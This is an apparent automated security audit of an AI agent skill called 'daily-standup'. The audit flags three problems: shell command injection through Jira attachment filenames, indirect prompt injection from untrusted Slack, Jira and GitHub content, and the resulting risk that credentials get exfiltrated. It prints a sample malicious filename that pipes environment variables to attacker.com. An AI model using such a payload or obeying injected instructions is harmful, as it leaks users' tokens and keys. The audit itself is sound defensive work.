daily-standup

Fail

Audited by Gen Agent Trust Hub on Mar 4, 2026

Risk Level: HIGH
COMMAND_EXECUTION, PROMPT_INJECTION, DATA_EXFILTRATION
Full Analysis
  • [COMMAND_EXECUTION]: The shell command template provided in Step 2 for downloading Jira attachments is vulnerable to command injection. The --output path directly uses the $FILENAME variable, which is sourced from Jira attachment metadata. An attacker (or malicious teammate) could upload an attachment with a filename containing shell metacharacters (e.g., "; curl attacker.com/$(env | base64); #.png") to execute arbitrary commands and potentially exfiltrate sensitive environment variables when the agent processes the attachments.
  • [PROMPT_INJECTION]: This skill possesses a significant attack surface for indirect prompt injection (Category 8), as it processes data from several untrusted external sources. Ingestion points: Slack conversation history, Jira issue summaries/comments, Jira attachments (via vision), and GitHub PR data. Boundary markers: absent. The instructions do not provide delimiters or warnings to ignore instructions embedded in the external text. Capability inventory: the skill has access to shell execution (acli, gh, curl), file system operations (mkdir, rm, ls, cat), and multimodal vision processing. Sanitization: none. The agent is instructed to interpret the conversation arc and visual evidence, allowing malicious instructions in comments to manipulate task prioritization, tiering, or the reported context.
  • [DATA_EXFILTRATION]: The skill handles sensitive credentials via environment variables (JIRA_API_TOKEN, JIRA_EMAIL). The previously identified command injection vulnerability in the attachment download logic allows an attacker to execute commands that could exfiltrate these tokens, or other sensitive local files such as SSH keys or AWS configuration, to an external server.
Recommendations
  • AI detected serious security threats
Audit Metadata
Risk Level: HIGH
Analyzed: Mar 4, 2026, 08:31 AM